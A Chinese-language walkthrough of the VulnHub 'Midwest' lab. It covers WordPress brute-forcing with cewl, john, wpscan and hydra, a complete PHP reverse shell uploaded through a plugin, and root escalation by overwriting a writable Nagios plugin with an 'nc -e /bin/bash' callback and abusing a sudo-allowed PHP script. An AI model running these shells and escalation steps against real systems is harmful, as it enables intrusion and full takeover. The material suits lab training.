靶机提示
wordpress渗透 复杂密码本生成 hydra爆破 nagios本地提权
靶机下载
https://download.vulnhub.com/midwest/midwest-v1.0.1.ova信息搜集
主机发现
nmap -sn 192.168.8.0/24 
端口扫描
nmap -sT --min-rate 10000 -p- 192.168.8.224
服务版本探测
nmap -sT -sC -sV -O -p80,22 192.168.8.225 -o ports只发现一个web服务
漏扫扫描
nmap --script=vuln -p80 192.168.8.225发现是wordpress框架
配置hosts
靶机指向的是一个域名,需要配一下
目录扫描
dirsearch -u http://www.midwest.htb发现还有一个nagios的服务
wordpress渗透
wpscan --url http://www.midwest.htb/ -e u --plugins-detection aggressive --api-token Bvc2asURf9JFmqaJYkAQLzOAalNOWr5TEOz5SZCmRqY扫到一个用户名,admin
wordpress密码爆破
爬虫生成小字典
cewl http://wwww.midwest.htb > pass.txt
wpscan --url http://www.midwest.htb/ -U User.txt -P pass.txt小字典没有跑出用户名和密码
rockyou大字典
wpscan --url http://www.midwest.htb/ -U User.txt -P /usr/share/wordlists/rockyou.txt密码跑了十分之一,没有结果
john生成高级密码本
根据爬虫拿到的小字典,生成一个有序且无重复的密码单词列表
john -rules -wordlist=pass.txt --stdout | sort | uniq > wordlist.txt
wpscan --url http://www.midwest.htb -U User.txt -P wordlist.txt成功拿到一个账号密码,admin/Power9
反弹shell
404页面写入反弹shell失败
在404.php页面写入反弹shell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.8.148'; // CHANGE THIS
$port = 8888; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?> 
遇到一点问题,提示无法更改源码,只能上传
plugin上传获取反弹shell
准备好反弹shell文件
限制只能上传zip的文件
抓包修改后缀
媒体里面可以看到上传的shell和位置
成功反弹shell
nagios系统渗透
google搜索得知,nagios的默认账号为nagiosadmin
HTTP基本认证的爆破
- 返回
401 Unauthorized- 数据包特征 Authorization: Basic YWRtaW46c2VjcmV0
使用hydra的基本认证爆破
hydra -l nagiosadmin -P wordlist.txt http-get://www.midwest.htb/nagios
拿到账号密码,nagiosadmin/PowerPower
拿到系统版本号
尝试反弹shell
没有找到好的利用脚本
提权
nagios提权
存在一个nagios用户
提权的着重点应该就在nagios系统
Nagios是一款开源免费(也有收费版的Nagios XI)的监控工具,可以用以监控Windows、Linux、Unix、Router、Switch,可以监控指定主机的物理基础资源或服务找了一下nagios的安装配置,其中commands.cfg文件可以写入命令
找一下这个文件
find / -name "commands.cfg" 2>/dev/null 具有写权限
配置了非常多命令,其中
$USER1$通常指向 Nagios 插件安装目录
/usr/local/nagios/libexec/找到了历史攻击的痕迹
该文件夹下所有脚本都具有可写的权限,只需要写入反弹shell,执行对应的功能函数,就能成功反弹shell
define command {
command_name check-host-alive
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w 3000.0,80% -c 5000.0,100% -p 5
}
define command {
command_name check-host-alive-http
command_line $USER1$/check_http -H $HOSTADDRESS$
}
define command {
command_name check-host-alive-tftp
command_line tftp $HOSTNAME$ 69
}
define command {
command_name check_bpi
command_line /usr/bin/php $USER1$/check_bpi.php $ARG1$
}
define command {
command_name check_capacity_planning
command_line $USER1$/check_capacity_planning.py $ARG1$ $ARG2$
}
define command {
command_name check_dhcp
command_line $USER1$/check_dhcp $ARG1$
}
define command {
command_name check_dir
command_line $USER1$/check_dir -d $ARG1$ -w $ARG2$ -c $ARG3$ $ARG4$
}
define command {
command_name check_dns
command_line $USER1$/check_dns -H $HOSTNAME$ $ARG1$
}
define command {
command_name check_docker
command_line $USER1$/check_docker.py $ARG1$
}
define command {
command_name check_dummy
command_line $USER1$/check_dummy $ARG1$ $ARG2$
}
define command {
command_name check_ec2
command_line $USER1$/check_ec2.py $ARG1$
}
define command {
command_name check_em01_humidity
command_line $USER1$/check_em01.pl --type=hum --hum=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em01_light
command_line $USER1$/check_em01.pl --type=illum --illum=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em01_temp
command_line $USER1$/check_em01.pl --type=temp --temp=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em08_contacts
command_line $USER1$/check_em08 $HOSTADDRESS$ C
}
define command {
command_name check_em08_humidity
command_line $USER1$/check_em08 $HOSTADDRESS$ H $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_light
command_line $USER1$/check_em08 $HOSTADDRESS$ I $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_rtd
command_line $USER1$/check_em08 $HOSTADDRESS$ R $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_temp
command_line $USER1$/check_em08 $HOSTADDRESS$ T $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_voltage
command_line $USER1$/check_em08 $HOSTADDRESS$ V $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_email_delivery
command_line $USER1$/check_email_delivery $ARG1$
}
define command {
command_name check_exchange_rbl
command_line $USER1$/check_bl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_file_service
command_line $USER1$/folder_watch.pl $ARG1$ $ARG2$ -f
}
define command {
command_name check_file_size_age
command_line $USER1$/folder_watch.pl $ARG1$ $ARG2$ -f
}
define command {
command_name check_ftp
command_line $USER1$/check_ftp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_ftp_fully
command_line $USER1$/check_ftp_fully "$ARG1$" "$ARG2$" "$ARG3$" $HOSTNAME$
}
define command {
command_name check_hpjd
command_line $USER1$/check_hpjd -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_http
command_line $USER1$/check_http -I $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_icmp
command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$
}
define command {
command_name check_imap
command_line $USER1$/check_imap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_json
command_line php $USER1$/check_json.php $ARG1$
}
define command {
command_name check_local_disk
command_line $USER1$/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$
}
define command {
command_name check_local_load
command_line $USER1$/check_load -w $ARG1$ -c $ARG2$
}
define command {
command_name check_local_mem
command_line $USER1$/custom_check_mem -w $ARG1$ -c $ARG2$ -n
}
define command {
command_name check_local_mrtgtraf
command_line $USER1$/check_mrtgtraf -F $ARG1$ -a $ARG2$ -w $ARG3$ -c $ARG4$ -e $ARG5$
}
define command {
command_name check_local_procs
command_line $USER1$/check_procs -w $ARG1$ -c $ARG2$ -s $ARG3$
}
define command {
command_name check_local_swap
command_line $USER1$/check_swap -w $ARG1$ -c $ARG2$
}
define command {
command_name check_local_users
command_line $USER1$/check_users -w $ARG1$ -c $ARG2$
}
define command {
command_name check_mailserver_rbl
command_line $USER1$/check_bl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_mongodb_database
command_line $USER1$/check_mongodb.py -H $HOSTADDRESS$ -A $ARG1$ -P $ARG2$ -W $ARG3$ -C $ARG4$ -u $ARG5$ -p $ARG6$ -d $ARG7$ -D
}
define command {
command_name check_mongodb_server
command_line $USER1$/check_mongodb.py -H $HOSTADDRESS$ -A $ARG1$ -P $ARG2$ -W $ARG3$ -C $ARG4$ -u $ARG5$ -p $ARG6$ -D --all-databases
}
define command {
command_name check_mountpoint
command_line $USER1$/check_mountpoints.sh $ARG1$
}
define command {
command_name check_nagiosxi_performance
command_line /usr/bin/php $USER1$/check_nagios_performance.php $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_nagios_performance
command_line $USER1$/check_nagios_performance -o $ARG1$ $ARG2$
}
define command {
command_name check_none
command_line /bin/true
}
define command {
command_name check_nrpe
command_line $USER1$/check_nrpe -H $HOSTADDRESS$ -t 30 -c $ARG1$ $ARG2$
}
define command {
command_name check_nrpeversion
command_line $USER1$/check_nrpe -H $HOSTADDRESS$
}
define command {
command_name check_nt
command_line $USER1$/check_nt -H $HOSTADDRESS$ -p $USER7$ -s $USER8$ -v $ARG1$ $ARG2$
}
define command {
command_name check_php_snmp_bandwidth
command_line $USER1$/get_snmp.php -H=$HOSTADDRESS$ -C=$ARG1$ -2 -I=$ARG2$ -u -w=$ARG3$ -c=$ARG4$ -d=$ARG5$
}
define command {
command_name check_ping
command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$ -p 5
}
define command {
command_name check_pop
command_line $USER1$/check_pop -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_proc_usage
command_line $USER1$/check_proc_usage -p $ARG1$ $ARG2$
}
define command {
command_name check_radius_server_py
command_line $USER1$/check_radius.py -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_s3
command_line $USER1$/check_s3.py $ARG1$
}
define command {
command_name check_smtp
command_line $USER1$/check_smtp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_snmp
command_line $USER1$/check_snmp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_snmp_int
command_line $USER1$/check_snmp_int.pl -H $HOSTADDRESS$ -C $ARG1$ -2 -n $ARG2$ -f -k -w $ARG3$ -c $ARG4$ $ARG5$
}
define command {
command_name check_ssh
command_line $USER1$/check_ssh $ARG1$ $HOSTADDRESS$
}
define command {
command_name check_tcp
command_line $USER1$/check_tcp -H $HOSTADDRESS$ -p $ARG1$ $ARG2$
}
define command {
command_name check_tftp_connect
command_line $USER1$/check_tftp.sh --connect $ARG1$
}
define command {
command_name check_tftp_get
command_line $USER1$/check_tftp.sh --get $ARG1$ '$ARG2$' $ARG3$
}
define command {
command_name check_udp
command_line $USER1$/check_udp -H $HOSTADDRESS$ -p $ARG1$ $ARG2$
}
define command {
command_name check_vmware_api_guest
command_line $USER1$/check_vmware_api.pl -H "$HOSTADDRESS$" -f "$ARG1$" -N "$ARG2$" -l "$ARG3$" $ARG4$
}
define command {
command_name check_vmware_api_host
command_line $USER1$/check_vmware_api.pl -H "$HOSTADDRESS$" -f "$ARG1$" -l "$ARG2$" $ARG3$
}
define command {
command_name check_xi_by_ssh
command_line $USER1$/check_by_ssh -H $HOSTADDRESS$ $ARG1$ $ARG2$
}
define command {
command_name check_xi_deface
command_line $USER1$/check_http -H $HOSTADDRESS$ -r '$ARG1$' -u '$ARG2$' $ARG3$
}
define command {
command_name check_xi_domain_v2
command_line $USER1$/check_domain.php -d $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_xi_host_http
command_line $USER1$/check_http -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_host_ping
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w $ARG1$,$ARG2$ -c $ARG3$,$ARG4$ -p 5
}
define command {
command_name check_xi_hyperv
command_line $USER1$/check_ncpa.py -H $HOSTADDRESS$ -t $_HOSTNCPA_TOKEN$ -P $_HOSTNCPA_PORT$ -M $ARG1$ -w $ARG2$ -c $ARG3$
}
define command {
command_name check_xi_java_as
command_line JAVA_ABS_PATH -Djava.class.path=$ARG2$:$USER1$/check_jvm.jar GenericASCheck $ARG1$
}
define command {
command_name check_xi_java_weblogic
command_line $USER1$/check_wlsagent.sh $ARG1$
}
define command {
command_name check_xi_mssql_database2
command_line $USER1$/check_mssql_server.php -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mssql_query
command_line $USER1$/check_mssql -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mssql_server2
command_line $USER1$/check_mssql_server.php -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mysql_health
command_line $USER1$/check_mysql_health $ARG1$
}
define command {
command_name check_xi_mysql_query
command_line $USER1$/check_mysql_health $ARG1$
}
define command {
command_name check_xi_nagiosxiserver
command_line /usr/bin/php $USER1$/check_nagiosxiserver.php $ARG1$
}
define command {
command_name check_xi_ncpa
command_line $USER1$/check_ncpa.py -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_nna
command_line $USER1$/check_nna.py -H $HOSTADDRESS$ -K $ARG1$ $ARG2$
}
define command {
command_name check_xi_oraclequery
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_oracleserverspace
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_oracletablespace
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_postgres
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_postgres_db
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_postgres_query
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_service_dns
command_line $USER1$/check_dns -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_dnsquery
command_line $USER1$/check_dns $ARG1$
}
define command {
command_name check_xi_service_ftp
command_line $USER1$/check_ftp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_hpjd
command_line $USER1$/check_hpjd -H $HOSTADDRESS$ -C $ARG1$
}
define command {
command_name check_xi_service_http
command_line $USER1$/check_http -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_http_cert
command_line $USER1$/check_http -H $HOSTADDRESS$ -C $ARG1$
}
define command {
command_name check_xi_service_http_content
command_line $USER1$/check_http -H $HOSTADDRESS$ --onredirect=follow -s "$ARG1$"
}
define command {
command_name check_xi_service_ifoperstatus
command_line $USER1$/check_ifoperstatus -H $HOSTADDRESS$ -C $ARG1$ -k $ARG2$ $ARG3$
}
define command {
command_name check_xi_service_ifoperstatusnag
command_line $USER1$/check_ifoperstatnag $ARG1$ $ARG2$ $HOSTADDRESS$
}
define command {
command_name check_xi_service_imap
command_line $USER1$/check_imap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_ldap
command_line $USER1$/check_ldap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_mrtgtraf
command_line $USER1$/check_rrdtraf -f /var/lib/mrtg/$ARG1$ -w $ARG2$ -c $ARG3$ -l $ARG4$
}
define command {
command_name check_xi_service_nagioslogserver
command_line $USER1$/check_nagioslogserver.php $ARG1$
}
define command {
command_name check_xi_service_none
command_line $USER1$/check_dummy 0 "Nothing to monitor"
}
define command {
command_name check_xi_service_nsclient
command_line $USER1$/check_nt -H $HOSTADDRESS$ -s "$ARG1$" -p 12489 -v $ARG2$ $ARG3$ $ARG4$
}
define command {
command_name check_xi_service_ping
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w $ARG1$,$ARG2$ -c $ARG3$,$ARG4$ -p 5
}
define command {
command_name check_xi_service_pop
command_line $USER1$/check_pop -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_smtp
command_line $USER1$/check_smtp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp
command_line $USER1$/check_snmp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_load
command_line $USER1$/check_snmp_load_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_process
command_line $USER1$/check_snmp_process_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_storage
command_line $USER1$/check_snmp_storage_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_watchguard
command_line $USER1$/check_snmp_generic.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_load
command_line $USER1$/check_snmp_load.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_process
command_line $USER1$/check_snmp_process.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_service
command_line $USER1$/check_snmp_win.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_storage
command_line $USER1$/check_snmp_storage.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_ssh
command_line $USER1$/check_ssh $ARG1$ $HOSTADDRESS$
}
define command {
command_name check_xi_service_status
command_line sudo /usr/local/nagiosxi/scripts/manage_services.sh status $ARG1$
}
define command {
command_name check_xi_service_tcp
command_line $USER1$/check_tcp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_udp
command_line $USER1$/check_udp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_webinject
command_line $USER1$/check_webinject.sh $ARG1$
}
define command {
command_name check_xi_service_wmiplus
command_line $USER1$/check_wmi_plus.pl -H $HOSTADDRESS$ -u $ARG1$ -p $ARG2$ -m $ARG3$ $ARG4$
}
define command {
command_name check_xi_service_wmiplus_authfile
command_line $USER1$/check_wmi_plus.pl -H $HOSTADDRESS$ -A $ARG1$ -m $ARG2$ $ARG3$
}
define command {
command_name check_xi_sla2
command_line $USER1$/check_xi_sla.php $ARG1$
}
define command {
command_name check_xml
command_line php $USER1$/check_xml.php $ARG1$
}
define command {
command_name notify-host-by-email
command_line /usr/bin/printf "%b" "***** Nagios Monitor XI Alert *****\n\nNotification Type: $NOTIFICATIONTYPE$\nHost: $HOSTNAME$\nState: $HOSTSTATE$\nAddress: $HOSTADDRESS$\nInfo: $HOSTOUTPUT$\n\nDate/Time: $LONGDATETIME$\n" | /bin/mail -s "** $NOTIFICATIONTYPE$ Host Alert: $HOSTNAME$ is $HOSTSTATE$ **" $CONTACTEMAIL$
}
define command {
command_name notify-service-by-email
command_line /usr/bin/printf "%b" "***** Nagios Monitor XI Alert *****\n\nNotification Type: $NOTIFICATIONTYPE$\n\nService: $SERVICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\n\nDate/Time: $LONGDATETIME$\n\nAdditional Info:\n\n$SERVICEOUTPUT$" | /bin/mail -s "** $NOTIFICATIONTYPE$ Service Alert: $HOSTALIAS$/$SERVICEDESC$ is $SERVICESTATE$ **" $CONTACTEMAIL$
}
define command {
command_name process-host-perfdata-file-bulk
command_line /bin/mv /usr/local/nagios/var/host-perfdata /usr/local/nagios/var/spool/xidpe/$TIMET$.perfdata.host
}
define command {
command_name process-host-perfdata-file-pnp-bulk
command_line /bin/mv /usr/local/nagios/var/host-perfdata /usr/local/nagios/var/spool/perfdata/host-perfdata.$TIMET$
}
define command {
command_name process-host-perfdata-pnp-normal
command_line /usr/bin/perl /usr/local/nagios/libexec/process_perfdata.pl -d HOSTPERFDATA
}
define command {
command_name process-service-perfdata-file-bulk
command_line /bin/mv /usr/local/nagios/var/service-perfdata /usr/local/nagios/var/spool/xidpe/$TIMET$.perfdata.service
}
define command {
command_name process-service-perfdata-file-pnp-bulk
command_line /bin/mv /usr/local/nagios/var/service-perfdata /usr/local/nagios/var/spool/perfdata/service-perfdata.$TIMET$
}
define command {
command_name process-service-perfdata-pnp-normal
command_line /usr/bin/perl /usr/local/nagios/libexec/process_perfdata.pl
}
define command {
command_name xi_host_event_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_event.php --handler-type=host --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --lasthoststate=$LASTHOSTSTATE$ --lasthoststateid=$LASTHOSTSTATEID$ --hoststatetype=$HOSTSTATETYPE$ --currentattempt=$HOSTATTEMPT$ --maxattempts=$MAXHOSTATTEMPTS$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --hostoutput="$HOSTOUTPUT$" --longhostoutput="$LONGHOSTOUTPUT$" --hostdowntime=$HOSTDOWNTIME$
}
define command {
command_name xi_host_notification_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_notification.php --notification-type=host --contact="$CONTACTNAME$" --contactemail="$CONTACTEMAIL$" --type=$NOTIFICATIONTYPE$ --escalated="$NOTIFICATIONISESCALATED$" --author="$NOTIFICATIONAUTHOR$" --comments="$NOTIFICATIONCOMMENT$" --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hostalias="$HOSTALIAS$" --hostdisplayname="$HOSTDISPLAYNAME$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --lasthoststate=$LASTHOSTSTATE$ --lasthoststateid=$LASTHOSTSTATEID$ --hoststatetype=$HOSTSTATETYPE$ --currentattempt=$HOSTATTEMPT$ --maxattempts=$MAXHOSTATTEMPTS$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --hostoutput="$HOSTOUTPUT$" --longhostoutput="$LONGHOSTOUTPUT$" --datetime="$LONGDATETIME$"
}
define command {
command_name xi_service_event_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_event.php --handler-type=service --host="$HOSTNAME$" --service="$SERVICEDESC$" --hostaddress="$HOSTADDRESS$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --servicestate=$SERVICESTATE$ --servicestateid=$SERVICESTATEID$ --lastservicestate=$LASTSERVICESTATE$ --lastservicestateid=$LASTSERVICESTATEID$ --servicestatetype=$SERVICESTATETYPE$ --currentattempt=$SERVICEATTEMPT$ --maxattempts=$MAXSERVICEATTEMPTS$ --serviceeventid=$SERVICEEVENTID$ --serviceproblemid=$SERVICEPROBLEMID$ --serviceoutput="$SERVICEOUTPUT$" --longserviceoutput="$LONGSERVICEOUTPUT$" --servicedowntime=$SERVICEDOWNTIME$
}
define command {
command_name xi_service_notification_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_notification.php --notification-type=service --contact="$CONTACTNAME$" --contactemail="$CONTACTEMAIL$" --type=$NOTIFICATIONTYPE$ --escalated="$NOTIFICATIONISESCALATED$" --author="$NOTIFICATIONAUTHOR$" --comments="$NOTIFICATIONCOMMENT$" --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hostalias="$HOSTALIAS$" --hostdisplayname="$HOSTDISPLAYNAME$" --service="$SERVICEDESC$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --servicestate=$SERVICESTATE$ --servicestateid=$SERVICESTATEID$ --lastservicestate=$LASTSERVICESTATE$ --lastservicestateid=$LASTSERVICESTATEID$ --servicestatetype=$SERVICESTATETYPE$ --currentattempt=$SERVICEATTEMPT$ --maxattempts=$MAXSERVICEATTEMPTS$ --serviceeventid=$SERVICEEVENTID$ --serviceproblemid=$SERVICEPROBLEMID$ --serviceoutput="$SERVICEOUTPUT$" --longserviceoutput="$LONGSERVICEOUTPUT$" --datetime="$LONGDATETIME$"
}另外一个还需注意需要使用nohup后台执行,保证反弹shell连接不中断
echo "nohup nc -e /bin/bash 192.168.8.148 1111&" > custom_check_mem等了大概三分钟,成功反弹shell
sudo提权
sudo -l 发现有非常多不需要root密码的sudo命令
查看对应文件是否有写的权限
ls -liah /usr/local/nagiosxi/scripts/send_to_nls.p
send_to_nls.php写入反弹shell
shell
echo "<?php system('/bin/bash'); ?>" > /usr/local/nagiosxi/scripts/send_to_nls.php成功提权
sudo /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
靶机总结
这台靶机的web入口很难打,爆破量特别大,rockyou的字典要跑到一千多万行;所以得采用特制得密码本,cewl提取关键信息然后用john生成高级密码本,才能较快的爆破出账号密码;
wordpress后台反弹shell一般常用,404页面注入payload,这台靶机也不行;采用的是plugin插件上传,然后用burp抓包绕过后缀名的限制上传反弹shell